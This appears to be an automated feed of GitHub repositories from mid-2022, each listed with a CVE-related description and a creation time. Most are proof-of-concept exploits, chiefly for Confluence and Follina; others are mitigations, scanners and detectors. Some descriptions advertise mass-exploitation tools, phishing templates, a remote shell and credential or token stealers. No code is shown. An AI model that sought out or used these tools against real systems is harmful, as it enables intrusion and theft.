exploit used in a sentence, silent exploit update, silent exploit unboxing, silent exploit usa, silent hack video, silent exploit website, silent exploit workers, silent exploit weakness, silent exploit warframe, silent exploit warzone, silent exploit windows 10, silent exploit web development, silent exploit xbox, silent hack youtubers, silent exploit zombs royale, silent exploit zombies, silent exploit 07, silent exploit 03, silent exploit 01, silent exploit 11.3.1, silent exploit 10 hours, silent exploit 101, silent exploit 2018, silent exploit 2021, silent exploit 2020, silent exploit 3ds, silent exploit 3ds fbi, silent exploit 3ds 11.7, silent exploit 30, silent exploit 360, silent exploit 4k, silent exploit 5.55, silent exploit 5.55 download, silent exploit 50, silent exploit 666, silent exploit 8d, silent exploit 8k, silent exploit 90s : razordeveloper/Silent-DOC-Exploit create time: 2022-06-08T16:31:36Z

no description : emrekara369/cve-2019-12461 create time: 2022-06-08T16:20:44Z

no description : emrekara369/cve-2019-1246 create time: 2022-06-08T16:20:34Z

no description : alpernae/CVE-2022-28132 create time: 2022-06-08T16:19:47Z

Microsoft vulnerability for CVE 2019-1205 in 2022. : razordeveloper/CVE-2019-1205 create time: 2022-06-08T15:51:36Z

no description : sentrium-security/Follina-Workaround-CVE-2022-30190 create time: 2022-06-08T14:20:50Z

no description : Trhackno/CVE-2022-1609 create time: 2022-06-08T11:28:08Z

Proof of Concept of CVE-2022-30190 : Malwareman007/Deathnote create time: 2022-06-08T10:58:23Z

Spring Cloud Gateway 远程代码执行漏洞 Spring_Cloud_Gateway_RCE_POC-CVE-2022-22947 : YDH777/CVE-2022-22947-POC create time: 2022-06-08T09:52:23Z

Atlassian confluence unauthenticated ONGL injection remote code execution scanner (CVE-2022-26134). : redhuntlabs/ConfluentPwn create time: 2022-06-08T04:53:31Z

no description : motherfucker12138/CVE-2020-0796_SMBGhost create time: 2022-06-08T07:52:26Z

no description : hou5/CVE-2022-26134 create time: 2022-06-08T07:54:56Z

Exploit vulnerabilities and vulnerability prevention implementation : TrG-1999/DetectPacket-CVE-2017-8464 create time: 2022-06-08T01:39:48Z

Proof of concept of the Log4Shell vulnerability (CVE-2021-44228) : jaehnri/CVE-2021-44228 create time: 2022-06-08T01:09:28Z

This project files demostrate a proof-of-concept of log4j vulnerability (CVE-2021-44228) on AWS using Terraform Infrastructure-as-a-code means. : moshuum/tf-log4j-aws-poc create time: 2022-06-07T13:30:37Z

PoC exploit for Tp-Link AX50 (CVE-2022-30075) : aaronsvk/CVE-2022-30075 create time: 2022-06-07T23:26:47Z

Server to host/activate Follina payloads & generator of malicious Word documents exploiting the MS-MSDT protocol. (CVE-2022-30190) : dsibilio/follina-spring create time: 2022-06-07T22:46:23Z

no description : PyterSmithDarkGhost/0DAYEXPLOITAtlassianConfluenceCVE-2022-26134 create time: 2022-06-07T19:59:55Z

CVE-2020-0796 explanation and researching vulnerability for term porject CENG325 : arzuozkan/CVE-2020-0796 create time: 2022-06-07T17:16:16Z

Notes related to CVE-2022-30190 : abhirules27/Follina create time: 2022-06-07T17:11:57Z

no description : Y000o/Confluence-CVE-2022-26134 create time: 2022-06-07T16:42:36Z

Simple Honeypot for Atlassian Confluence (CVE-2022-26134) : SIFalcon/confluencePot create time: 2022-06-06T15:44:24Z

CVE-2021-41773 | Apache HTTP Server 2.4.49 is vulnerable to Path Traversal and Remote Code execution attacks : hab1b0x/CVE-2021-41773 create time: 2022-06-07T11:22:08Z

Atlassian Confluence- Unauthenticated OGNL injection vulnerability (RCE) : hab1b0x/CVE-2022-26134 create time: 2022-06-07T11:55:37Z

Apache 2.4.49 RCE CVE-2021-41773 in Ruby : hab1b0x/CVE-2021-41773 create time: 2022-06-07T10:38:23Z

Exploit for CVE-2022-26134: Confluence Pre-Auth Remote Code Execution via OGNL Injection : whokilleddb/CVE-2022-26134-Confluence-RCE create time: 2022-06-07T11:17:25Z

CVE-2022-26134 Confluence OGNL Injection POC : alcaparra/CVE-2022-26134 create time: 2022-06-07T10:36:11Z

Microsoft Support Diagnostic Tool (CVE-2022-30190) : joshuavanderpoll/CVE-2022-30190 create time: 2022-06-07T10:07:52Z

CVE-2022-23222: Linux Kernel eBPF Local Privilege Escalation : tr3ee/CVE-2022-23222 create time: 2022-06-07T03:20:23Z

no description : BeichenDream/CVE-2022-26134-Godzilla-MEMSHELL create time: 2022-06-07T09:19:02Z

Implementation of CVE-2022-26134 : reubensammut/cve-2022-26134 create time: 2022-06-07T08:58:07Z

Atlassian Confluence 远程代码执行漏洞(CVE-2022-26134) : li8u99/CVE-2022-26134 create time: 2022-06-07T06:57:02Z

C# POC for CVE-2021-26855 aka ProxyLogon, supports the classically semi-interactive web shell as well as shellcode in… : 1342486672/Flangvik create time: 2022-06-07T02:09:10Z

no description : vesperp/CVE-2022-26134-Confluence create time: 2022-06-07T02:16:56Z

no description : PsykoDev/CVE-2022-26134 create time: 2022-06-06T16:45:35Z

Désactivation du protocole MSDT URL (CVE-2022-30190) avec gestion des erreurs et de l'exit code pour un déploiement en masse : Rojacur/FollinaPatcherCLI create time: 2022-06-06T16:25:41Z

CVE-2022-0847 used to achieve container escape : greenhandatsjtu/CVE-2022-0847 create time: 2022-06-04T08:31:32Z

no description : Satheesh575555/system_bt_AOSP10_r33_CVE-2021-0589 create time: 2022-06-06T12:13:41Z

Exploit in Rails Development Mode. With some knowledge of a target application it is possible for an attacker to guess the automatically generated development mode secret token. This secret token can be used in combination with other Rails internals to escalate to a remote code execution exploit. : PenTestical/CVE-2019-5420 create time: 2022-06-06T10:01:35Z

Microsoft MS-MSDT Follina (0-day Vulnerability) CVE-2022-30190 Attack Vector : IamVSM/msdt-follina create time: 2022-06-06T09:17:25Z

This repository talks about Zero-Day Exploitation of Atlassian Confluence, it's defense and analysis point of view from a SecOps or Blue Team perspective : archanchoudhury/Confluence-CVE-2022-26134 create time: 2022-06-06T06:16:47Z

TCP, when using a large Window Size, makes it easier for remote attackers to guess sequence numbers and cause a denial of service (connection loss) to persistent TCP connections by repeatedly injecting a TCP RST packet. : RakeshShinde97/CVE-2004-0230-TCP-Sequence-Number-Approximation-Based-Denial-of-Service create time: 2022-06-06T04:30:03Z

Confluence Pre-Auth Remote Code Execution via OGNL Injection (CVE-2022-26134) : h3v0x/CVE-2022-26134 create time: 2022-06-06T02:43:06Z

no description : Trhackno/CVE-2021-35064 create time: 2022-06-06T00:14:54Z

Proof of Concept/Test for CVE-2022-24713 on Ubuntu : ItzSwirlz/CVE-2022-24713-POC create time: 2022-06-05T22:17:00Z

Challenge for you all to prove that CVE-2022–29622 is not false : keymandll/CVE-2022-29622 create time: 2022-06-05T22:15:21Z

no description : abhishekmorla/CVE-2022-26134 create time: 2022-06-05T20:35:38Z

no description : 0xAgun/CVE-2022-26134 create time: 2022-06-05T18:23:20Z

no description : rodnt/CVE_2022_26134-detect create time: 2022-06-05T17:44:20Z

no description : diurs/CVE-2020-24186-wordpress-wpDiscuz create time: 2022-06-05T17:08:55Z

no description : ItsNee/Folina-CVE-2022-30190-POC create time: 2022-06-05T13:54:04Z

CVE-2022-26134 : 1rm/Confluence-CVE-2022-26134 create time: 2022-06-05T13:51:39Z

Atlassian confluence poc : axingde/CVE-2022-26134 create time: 2022-06-05T13:41:25Z

no description : Vulnmachines/Confluence-CVE-2022-26134 create time: 2022-06-05T12:23:34Z

no description : tej7gandhi/CVE-2022-30190-Zero-Click-Zero-Day-in-msdt create time: 2022-06-05T08:52:11Z

cve2022-26134 : 0x14dli/cve2022-26134exp create time: 2022-06-05T03:11:50Z

Wordpress Plugin WP User Frontend < 3.5.26 - SQL-Injection (Authenticated) : 0xAbbarhSF/CVE-2021-25076 create time: 2022-06-04T21:22:10Z

A file upload restriction bypass vulnerability in Pluck CMS before 4.7.13 allows an admin privileged user to gain access in the host through the "manage files" functionality, which may result in remote code execution. : 0xAbbarhSF/CVE-2020-29607 create time: 2022-06-04T21:09:38Z

Dump SQL database version on host running Casdoor < 1.13.1 : 0xAbbarhSF/CVE-2022-24124 create time: 2022-06-04T21:01:22Z

no description : DerZiad/CVE-2022-30190 create time: 2022-06-04T19:48:37Z

CVE-2022-29464 PoC for WSO2 products : jimidk/Better-CVE-2022-29464 create time: 2022-06-04T16:46:52Z

PoC of CVE-2022-22978 vulnerability in Spring Security framework : ducluongtran9121/CVE-2022-22978-PoC create time: 2022-06-04T16:57:18Z

Remote Access Shell for Windows (based on cve-2021-30190) : CyberTitus/Follina create time: 2022-06-04T14:18:38Z

【懒人神器】一款图形化、批量采集url、批量对采集的url进行各种nday检测的工具。可用于src挖掘、cnvd挖掘、0day利用、打造自己的武器库等场景。可以批量利用Actively Exploited Atlassian Confluence 0Day CVE-2022-26134。 : W01fh4cker/Serein create time: 2022-05-31T07:44:01Z

no description : Sakura-nee/CVE-2022-26134 create time: 2022-06-04T13:02:10Z

no description : e4r23fd/Nft-Grabber-Stealer-Exploit-Cve-2022-Steal-BlockHain-Hack-Nft create time: 2022-06-04T11:44:51Z

CVE-2022-26133 Exploit : 0xAbbarhSF/CVE-2022-26133 create time: 2022-06-04T11:31:48Z

CVE-2021-3129 : 914525753/Laravel-CVE-2021-3129 create time: 2022-06-04T10:58:47Z

Confluence OGNL expression injected RCE(CVE-2022-26134) poc and exp : SNCKER/CVE-2022-26134 create time: 2022-06-04T11:16:28Z

Confluence Server and Data Center - CVE-2022-26134 - Critical severity unauthenticated remote code execution vulnerability PoC : shamo0/CVE-2022-26134 create time: 2022-06-04T10:44:38Z

(CVE-2022-26134)an unauthenticated and remote OGNL injection vulnerability resulting in code execution in the context of the Confluence server : Brucetg/CVE-2022-26134 create time: 2022-06-04T10:27:50Z

CVE、CMS、中间件漏洞检测利用合集 Since 2019-9-15 : 812262605/mai-lang-chain create time: 2022-06-04T06:23:52Z

no description : kyxiaxiang/CVE-2022-26134 create time: 2022-06-04T05:46:48Z

no description : Trhackno/XSS-CVE-2022-30489 create time: 2022-06-04T02:31:50Z

CVE-2021-45022 and CVE-2021-45024 : cptsticky/xxe-zena create time: 2022-06-04T01:46:53Z

Atlassian Confluence (CVE-2022-26134) - Unauthenticated Remote Code Execution (RCE) : Nwqda/CVE-2022-26134 create time: 2022-06-03T21:07:30Z

no description : Trhackno/CVE-2022-26133 create time: 2022-06-03T19:25:18Z

CVE-2022-26134 - Confluence Pre-Auth RCE | OGNL injection : crowsec-edtech/CVE-2022-26134 create time: 2022-06-03T19:24:30Z

no description : Trhackno/CVE-2020-29597 create time: 2022-06-03T19:12:57Z

CVE-2022-26134 ATLASIAN CONFULENCE UNAUTHETICATED RCE : oturu/CVE-2022-26134-POC create time: 2022-06-03T18:32:35Z

CVE-2022-26134 Proof of Concept : jbaines-r7/through_the_wire create time: 2022-06-03T13:59:19Z

no description : TanmoyG1800/CVE-2021-4034 create time: 2022-06-03T17:03:44Z

Generate SSRF payloads : MKSx/CVE-2021-22054 create time: 2022-06-03T14:06:02Z

CVE-2022-26134 an Unauthenticated Remote Code Execution in Atlassian Confluence (CVE-2022-26134) : konjo4/CVE-2022-26134 create time: 2022-06-03T14:12:58Z

no description : e4r23fd/Jpg-Png-Exploit-Downloader-Fud-Cryter-Malware-Builder-Cve-2022 create time: 2022-06-03T14:09:22Z

no description : th3b3ginn3r/CVE-2022-26134-Exploit-Detection-on-Linux create time: 2022-06-03T13:52:14Z

0-DAY: Unauthenticated Remote Code Execution in Atlassian Confluence (CVE-2022-26134). : cve-hunter/CVE-2022-26134 create time: 2022-06-03T13:42:32Z

Spring exploit (LIMITED COPIES) : Expl0desploit/CVE-2022-22965 create time: 2022-06-03T12:56:08Z

no description : e4r23fd/Discord-Image-Token-Password-Grabber-Exploit-Cve-2022 create time: 2022-06-03T12:53:14Z

CVE-2022-26134 vuln domains : s0rtega/CVE-2022-26134_vuln create time: 2022-06-03T10:38:51Z

0-DAY: Unauthenticated Remote Code Execution in Atlassian Confluence (CVE-2022-26134). : CyberDonkyx0/CVE-2022-26134 create time: 2022-06-03T09:30:51Z

VMware Workspace ONE Access and Identity Manager RCE via SSTI. CVE-2022-22954 - PoC SSTI * exploit+payload+shodan (ну набором) : badboy-sft/CVE-2022-22954 create time: 2022-06-03T09:17:12Z

no description : orwagodfather/CVE-2022-22954 create time: 2022-06-03T08:51:44Z

Information and scripts for the confluence CVE-2022-26134 : offlinehoster/CVE-2022-26134 create time: 2022-06-03T08:01:49Z

Follina POC by John Hammond : SrikeshMaharaj/CVE-2022-30190 create time: 2022-06-03T08:00:01Z

Powershell script to mitigate cve-2022-30190 : hilt86/cve-2022-30190-mitigate create time: 2022-06-03T06:54:35Z

no description : Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20004 create time: 2022-06-03T06:24:34Z

Microsoft's recommended mitigation for CVE-2022-30190 using Powershell : hilt86/cve-2022-30190-mitigate create time: 2022-06-03T06:03:15Z

This is to patch CVE-2022-30190. Use at your own risk. : droidrzrlover/CVE-2022-30190 create time: 2022-06-03T05:52:36Z

Fidelis Network and Deception - Insecure File Permissions Privilege Escalation : henryreed/CVE-2022-0997 create time: 2022-06-03T05:46:10Z

Fidelis Network and Deception - Insecure File Permissions Privilege Escalation - Multiple : henryreed/CVE-2022-0486 create time: 2022-06-03T05:06:52Z

Bash poc for CVE-2022-1609 WordPress Weblizar Backdoor : NullBrunk/CVE-2022-1609 create time: 2022-06-03T02:49:49Z

Python exploit for CVE-2011-2523 : NullBrunk/CVE-2011-2523 create time: 2022-06-03T00:17:18Z

All about CVE-2022-30190, aka follina, that is a RCE vulnerability that affects Microsoft Support Diagnostic Tools (MSDT) on Office apps such as Word. This is a very simple POC, feel free to check the sources below for more threat intelligence. : Noxtal/follina create time: 2022-06-03T00:25:37Z

no description : trhacknon/exploit-CVE-2014-6271 create time: 2022-06-02T21:52:52Z

no description : trhacknon/CVE-2014-6271 create time: 2022-06-02T21:33:59Z

CVE-2022-30190 Zero click rce Mass Exploitation Tool with Multi threading capabilities : Kesinger57/CVE-2022-30190-mass-rce create time: 2022-06-02T17:28:27Z

no description : arozx/CVE-2022-30910 create time: 2022-06-02T16:14:13Z

CVE-2022-30190 | MS-MSDT Follina One Click : AchocolatechipPancake/MS-MSDT-Office-RCE-Follina create time: 2022-06-02T16:09:02Z

no description : intentagmbh/cve_2022-30190 create time: 2022-06-02T15:40:10Z

Simple Follina poc exploit : WesyHub/CVE-2022-30190---Follina---Poc-Exploit create time: 2022-06-02T15:39:20Z

PDQ Package I created for CVE-2022-30190 : castlesmadeofsand/ms-msdt-vulnerability-pdq-package create time: 2022-06-02T15:33:15Z

CVE-2020-2551 Exploiter : 0xAbbarhSF/CVE-Exploit create time: 2022-06-02T14:20:43Z

The CVE-2022-30190-follina Workarounds Patch : suegdu/CVE-2022-30190-Follina-Patch create time: 2022-06-02T13:43:20Z

A proof of concept of an SEH overflow with arbitrary dll injection : lem0nSec/CVE-2010-5301 create time: 2022-06-01T22:12:07Z

no description : tjcim/cve-2018-6574 create time: 2022-06-02T12:52:56Z

no description : aabbcc19191/CVE-2020-13935 create time: 2022-06-02T13:21:25Z

no description : swaiist/CVE-2022-30190-Fix create time: 2022-06-02T13:01:46Z

no description : gyaansastra/CVE-2022-30190 create time: 2022-06-02T12:58:24Z

no description : tjcim/cve-2018-6574-1 create time: 2022-06-02T12:35:08Z

no description : gyaansastra/CVE2022-30190 create time: 2022-06-02T12:44:02Z

CVE-2022-30190-follina.py-修改版,可以自定义word模板,方便实战中钓鱼使用。 : komomon/CVE-2022-30190-follina-Office-MSDT-Fixed create time: 2022-06-02T12:33:18Z

Mitigates the "Folina"-ZeroDay (CVE-2022-30190) : derco0n/mitigate-folina create time: 2022-06-02T09:30:13Z

Bai cuoi ky CVE-2022-24644 : ThanhThuy2908/ATHDH_CVE_2022_24644 create time: 2022-06-02T07:32:15Z

no description : ITMarcin2211/CVE-2022-30190 create time: 2022-06-02T07:01:19Z

A tool written in Go that scans files & directories for the Follina exploit (CVE-2022-30190) : ErrorNoInternet/FollinaScanner create time: 2022-06-02T06:45:19Z

no description : trhacknon/CVE-2021-35064 create time: 2022-06-02T03:07:40Z

Python script to exploit CVE-2021-35064 and CVE-2021-36356 : Chocapikk/CVE-2021-35064 create time: 2022-06-02T02:19:49Z

MSDT protocol disabler (CVE-2022-30190 patch tool) : gamingwithevets/msdt-disable create time: 2022-06-02T02:47:34Z

no description : trhacknon/CVE-2022-22954 create time: 2022-06-02T01:44:07Z

MS-MSDT Follina CVE-2022-30190 PoC document generator : sudoaza/CVE-2022-30190 create time: 2022-06-01T23:27:14Z

Proof of Concept zu MSDT-Follina - CVE-2022-30190. ÜBERPRÜFUNG DER WIRKSAMKEIT VON MICROSOFT DEFNEDER IN DER JEWEILS AKTUELLSTEN WINDOWS 10 VERSION. : ImproveCybersecurityJaro/2022_PoC-MSDT-Follina-CVE-2022-30190 create time: 2022-06-01T23:07:26Z

CVE-2022-30190 or "Follina" 0day proof of concept : rayorole/CVE-2022-30190 create time: 2022-06-01T21:33:18Z

Exploit to trigger RCE for CVE-2018-16763 on FuelCMS <= 1.4.1 and interactive shell. : p0dalirius/CVE-2018-16763-FuelCMS-1.4.1-RCE create time: 2022-05-31T15:31:37Z

no description : trhacknon/CVE-2019-16759 create time: 2022-06-01T20:28:43Z

Removes the ability for MSDT to run, in response to CVE-2022-30190 (Follina) : Cosmo121/Follina-Remediation create time: 2022-06-01T20:26:56Z

Python script to exploit CVE-2022-22954 and then exploit CVE-2022-22960 : Chocapikk/CVE-2022-22954 create time: 2022-06-01T19:33:32Z

An NSIS script that helps deploy and roll back the mitigation registry patch for CVE-2022-30190 as recommended by Microsoft : rouben/CVE-2022-30190-NSIS create time: 2022-06-01T18:58:07Z

no description : trhacknon/CVE-2022-22954-PoC create time: 2022-06-01T18:33:45Z

no description : Vaisakhkm2625/MSDT-0-Day-CVE-2022-30190-Poc create time: 2022-06-01T16:11:33Z

no description : mitespsoc/CVE-2022-30190-POC create time: 2022-06-01T14:55:43Z

no description : Kyleifpossible/CVE202230190test1 create time: 2022-06-01T14:24:00Z

no description : Kyleifpossible/CVE202230190test0 create time: 2021-12-04T06:58:57Z

Just another PoC for the new MSDT-Exploit : drgreenthumb93/CVE-2022-30190-follina create time: 2022-06-01T11:37:08Z

no description : hscorpion/CVE-2022-30190 create time: 2022-06-01T10:13:16Z

no description : Icare1337/CVE-2022-30190 create time: 2022-06-01T09:25:24Z

CVE-2022-30190 Zero click rce Mass Exploitation Tool with Multi threading capabilities : Kesinger57/CVE-2022-30190-mass create time: 2022-06-01T09:19:34Z

Follina MS-MSDT 0-day MS Office RCE (CVE-2022-30190) PoC in Go : dwisiswant0/gollina create time: 2022-06-01T09:02:00Z

no description : gerr-re/cve-2022-27438 create time: 2022-06-01T08:33:16Z

Phone number notification bug : fordsham/CVE-2021-30956 create time: 2022-06-01T07:09:18Z

no description : Ran-Xing/cve-2022-193372 create time: 2022-06-01T05:32:09Z

MSDT 0-Day Mass Exploitation Tool : ExploitPwner/CVE-2022-30190 create time: 2022-06-01T04:15:25Z

no description : trhacknon/CVE-2022-29303 create time: 2022-05-31T23:40:18Z

CVE-2022-30190 remediation via removal of ms-msdt from Windows registry : PaddlingCode/cve-2022-30190 create time: 2022-05-31T23:32:33Z

Python script to exploit CVE-2022-29303 : Chocapikk/CVE-2022-29303 create time: 2022-05-31T22:55:05Z

Node

: Mouhamedtec/CVE-2022-1192 create time: 2022-05-31T20:38:06Z

no description : mghostz/CVE202230190 create time: 2022-05-31T20:24:44Z

A remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word. An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application. The attacker can then install programs, view, change, or delete data, or create new accounts in the context allowed by the user’s rights. : sentinelblue/CVE-2022-30190 create time: 2022-05-31T18:00:42Z

no description : trhacknon/CVE-2022-30190 create time: 2022-05-31T18:58:55Z

no description : aymankhder/MSDT_CVE-2022-30190-follina- create time: 2022-05-31T18:45:34Z

no description : trhacknon/CVE-2022-30190 create time: 2022-05-31T18:21:30Z

CVE-2022-30190- A Zero-Click RCE Vulnerability In MSDT : kdk2933/msdt-follina-office create time: 2022-05-31T17:54:20Z

Picking up processes that have triggered ASR related to CVE-2022-30190 : DOV3Y/CVE-2022-30190-ASR-Senintel-Process-Pickup create time: 2022-05-31T16:11:14Z

Aka Follina = benign POC. : rickhenderson/cve-2022-30190 create time: 2022-05-31T14:50:55Z

This Repository Talks about the Follina MSDT from Defender Perspective : archanchoudhury/MSDT_CVE-2022-30190 create time: 2022-05-31T14:10:11Z

no description : anniehelkekpl92/CVE-2022 create time: 2022-05-31T12:38:16Z

Microsoft Office Word Rce 复现(CVE-2022-30190) : bytecaps/CVE-2022-30190 create time: 2022-05-31T12:15:18Z

no description : Exzh34/PentestLab-CVE-2018-6574-go-get-RCE create time: 2022-05-31T11:17:51Z

no description : JCPpeiqi/-cve-2021-46381 create time: 2022-05-31T10:54:40Z

CVE-2022-30190 Follina POC : onecloudemoji/CVE-2022-30190 create time: 2022-05-31T06:45:25Z

no description : JMousqueton/PoC-CVE-2022-30190 create time: 2022-05-30T18:17:38Z

no description : tuannq2299/CVE-2019-8942 create time: 2022-05-31T03:28:22Z

Exploit for Apache 2.4.50 (CVE-2021-42013) : viliuspovilaika/cve-2021-42013 create time: 2022-05-31T03:28:20Z

no description : tuannq2299/CVE-2021-43408 create time: 2022-05-31T03:00:27Z

CVE-2022-22978 Spring-Security bypass Demo : DeEpinGh0st/CVE-2022-22978 create time: 2022-05-31T03:14:55Z

CVE-2022-1292 OpenSSL c_rehash Vulnerability : rama291041610/CVE-2022-1292 create time: 2022-05-30T16:59:54Z

no description : SenpaiX00/CVE-05-2022-0438 create time: 2022-05-30T15:41:44Z

CVE-2022-1292 OpenSSL c_rehash Vulnerability : alcaparra/CVE-2022-1292 create time: 2022-05-30T14:45:15Z

WPQA < 5.5 - Unauthenticated Private Message Disclosure : V35HR4J/CVE-2022-1598 create time: 2022-05-30T10:54:19Z

no description : Trinadh465/System_bt_AOSP10_r33_CVE-2021-0589 create time: 2022-05-30T08:41:07Z

no description : Trinadh465/System_bt_AOSP10_r33_CVE-2021-0589 create time: 2022-05-30T07:49:14Z

CVE-2022-24086 and CVE-2022-24087 are an rce in adobe commerce and magento : TomArni680/CVE-2022-24086-MASS-RCE create time: 2022-05-30T07:08:41Z

Exploit CVE-2021-24160 : hnthuan1998/Exploit-CVE-2021-24160 create time: 2022-05-30T01:48:27Z

no description : hnthuan1998/CVE-2021-24160 create time: 2022-05-30T01:46:50Z

no description : SecurityBoi/TEST-CVE-05-2022-0438 create time: 2022-05-29T18:05:30Z

exploit is already public : TomArni680/CVE-2022-1388-RCE create time: 2022-05-29T15:29:44Z

CVE-2022-26809 | is a remote code execution vulnerablity in rpc runtime and affects a wide versions of windows : seciurdt/CVE-2022-26809-MASS-RCE create time: 2022-05-29T14:58:52Z

no description : Wrong-pixel/CVE-2022-22947-exp create time: 2022-05-29T01:07:26Z

vmware authentication bypass : Dghpi9/CVE-2022-22972 create time: 2022-05-28T20:56:09Z

CVE-2020-5902 CVE-2021-22986 CVE-2022-1388 POC集合 : west9b/F5-BIG-IP-POC create time: 2022-05-28T13:30:22Z

Mass RCE VIA CVE-2022-6809 AND THE METASPLOIT MODULE : ChrisopherJohanso/CVE-2022-26809-RCE create time: 2022-05-28T13:52:35Z

no description : trhacknon/CVE-2022-1388-PocExp create time: 2022-05-28T12:46:08Z

no description : trhacknon/Exploit-F5-CVE-2022-1388 create time: 2022-05-28T12:43:18Z

no description : trhacknon/F5-CVE-2022-1388-Exploit create time: 2022-05-28T12:40:56Z

no description : trhacknon/CVE-2022-1388 create time: 2022-05-28T12:35:59Z

Wordpress 5.8.2 CVE-2022-21661 Vuln enviroment POC exploit : 0x4E0x650x6F/Wordpress-cve-CVE-2022-21661 create time: 2022-05-28T10:46:48Z

no description : west9b/CVE-2022-30525 create time: 2022-05-28T07:19:31Z

no description : kuznyJan1972/CVE-2022-23121-MASS-RCE create time: 2022-05-28T05:48:35Z

FreePascal implementation of the UnrealIRCD CVE-2010-2075 : MFernstrom/Offensive-Pascal-CVE-2010-2075 create time: 2022-05-28T02:47:22Z

FreePascal implementation of CVE-2011-2523 : MFernstrom/OffensivePascal-CVE-2011-2523 create time: 2022-05-27T20:47:01Z

CVE-2019-9729. Transferred from https://github.com/DoubleLabyrinth/SdoKeyCrypt-sys-local-privilege-elevation : recozone/HyperSine create time: 2022-05-27T15:34:39Z

no description : jftierno/CVE-2018-6574-2 create time: 2022-05-27T15:10:11Z

Exploit for Pentester Labs : Cypheer/exploit_CVE-2018-6574 create time: 2022-05-27T14:35:11Z

CVE-2022-1609 WordPress Weblizar后门 : savior-only/CVE-2022-1609 create time: 2022-05-27T13:15:38Z

CVE-2018-17456复现 : jiahuiLeee/test create time: 2022-05-27T11:56:07Z

A PoC / methodology to exploit CVE-2017-6516 : Rubytox/CVE-2017-6516-mcsiwrapper- create time: 2022-05-27T10:24:41Z

no description : pthlong9991/CVE202228346 create time: 2022-05-27T10:08:55Z

CVE-2022-24494 : vportal/AFD create time: 2022-05-27T09:52:52Z

exploit for T3 rce (CVE 2015-4852 \CVE 2016-0638 \CVE 2016-3510) : minhangxiaohui/Weblogic_direct_T3_Rces create time: 2022-05-27T08:04:24Z

no description : trhacknon/CVE-2022-29464-mass create time: 2022-05-26T22:02:45Z

Python script to exploit CVE-2022-29464 (mass mode) : Chocapikk/CVE-2022-29464 create time: 2022-05-26T20:19:53Z

.json and .yaml files used to exploit CVE-2018-25031 : afine-com/CVE-2018-25031 create time: 2022-05-26T19:06:21Z

APOLOGEE is a Python script and Metasploit module that enumerates a hidden directory on Siemens APOGEE PXC BACnet Automation Controllers (all versions prior to V3.5) and TALON TC BACnet Automation Controllers (all versions prior to V3.5). With a 7.5 CVSS, this exploit allows for an attacker to perform an authentication bypass using an alternate path or channel to access hidden directories in the web server. This repository takes advantage of CVE-2017-9947. : RoseSecurity/APOLOGEE create time: 2022-05-26T01:13:42Z

no description : horizon3ai/CVE-2022-22972 create time: 2022-05-24T20:19:55Z

no description : gog1071/Spring4Shell-CVE-2022-22965 create time: 2022-05-26T11:39:25Z

no description : trhacknon/CVE-2019-15107 create time: 2022-05-26T04:57:40Z

no description : trhacknon/CVE-2019-15642 create time: 2022-05-26T04:30:14Z

sudo提权漏洞CVE-2021-3156复现代码 : q77190858/CVE-2021-3156 create time: 2022-05-26T02:47:53Z

Implementation of CVE-2018-6242 (AKA Fusée Gelée, AKA shofel2) : Swiftloke/fusee-toy create time: 2022-05-25T19:51:06Z

School Dormitory Management System 1.0 - Reflected XSS : bigzooooz/CVE-2022-30513 create time: 2022-05-25T16:46:09Z

School Dormitory Management System 1.0 - Reflected XSS : bigzooooz/CVE-2022-30514 create time: 2022-05-25T16:42:25Z

School Dormitory Management System 1.0 - Unauthenticated SQL Injection : bigzooooz/CVE-2022-30511 create time: 2022-05-25T16:35:06Z

School Dormitory Management System 1.0 - Unauthenticated SQL Injection : bigzooooz/CVE-2022-30510 create time: 2022-05-25T16:32:18Z

School Dormitory Management System 1.0 - Unauthenticated SQL Injection : bigzooooz/CVE-2022-30512 create time: 2022-05-25T16:23:53Z

C-DATA FD702XW-X-R430 v2.1.13_X001 was discovered to contain a command injection vulnerability via the va_cmd parameter in formlanipv6. This vulnerability allows attackers to execute arbitrary commands via a crafted HTTP request. : exploitwritter/CVE-2022-29337 create time: 2022-05-25T13:02:34Z

Atlassian Jira Seraph Authentication Bypass RCE(CVE-2022-0540) : Pear1y/CVE-2022-0540-Preauth-RCE create time: 2022-05-25T10:47:04Z

no description : Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2020-0188_CVE-0219 create time: 2022-05-25T10:01:58Z

no description : Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2020-0219_CVE-2020-0188_old-one create time: 2022-05-25T09:54:40Z

no description : Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2020-0219_CVE-2020-0188_old create time: 2022-05-25T09:31:03Z

no description : Trinadh465/external_lib_AOSP10_r33_CVE-2021-45960_CVE-2021-46143- create time: 2022-05-25T09:03:48Z

no description : Trinadh465/platform_external_gptfdisk_AOSP10_r33_CVE-2021-0308 create time: 2022-05-25T06:50:30Z

no description : trhacknon/CVE-2022-1292 create time: 2022-05-25T07:06:48Z

CVE-2022-29221 Proof of Concept Code : sbani/CVE-2022-29221-PoC create time: 2022-05-25T06:02:23Z

Csrf file upload insecure : trhacknon/CVE-2020-29597 create time: 2022-05-25T01:10:01Z

no description : yuuki1967/CVE-2021-44228-Apache-Log4j-Rce create time: 2022-05-25T01:56:14Z

Triconsole 3.75 - Reflected XSS : trhacknon/CVE-2021-27330 create time: 2022-05-25T00:09:20Z

🍵 Gitea repository migration remote command execution exploit. : wuhan005/CVE-2022-30781 create time: 2022-05-22T05:15:58Z

no description : b1ackros337/CVE-2020-25213 create time: 2022-05-24T16:35:23Z

SDT-CW3B1 1.1.0 - OS Command Injection : nobodyatall648/CVE-2021-46422 create time: 2022-05-24T16:45:41Z

CVE-2022-1292 : li8u99/CVE-2022-1292 create time: 2022-05-24T09:26:29Z

no description : whr819987540/test_CVE-2020-26233 create time: 2022-05-24T08:49:01Z

no description : Satheesh575555/external_expat_AOSP10_r33_CVE-2022-25235 create time: 2022-05-24T07:00:24Z

Tinker Script for CVE-2022-23046 : bernauers/CVE-2022-23046 create time: 2022-05-23T20:44:15Z

Initial POC for the CVE-2022-30525 : iveresk/cve-2022-30525 create time: 2022-05-23T16:51:42Z

Vulnearability Report of the New Jersey official site : korestreet/https-nj.gov---CVE-2018-14042 create time: 2022-05-23T08:27:22Z

Vulnearability Report of the New Jersey official site : korestreet/https-nj.gov---CVE-2018-14040 create time: 2022-05-23T08:11:01Z

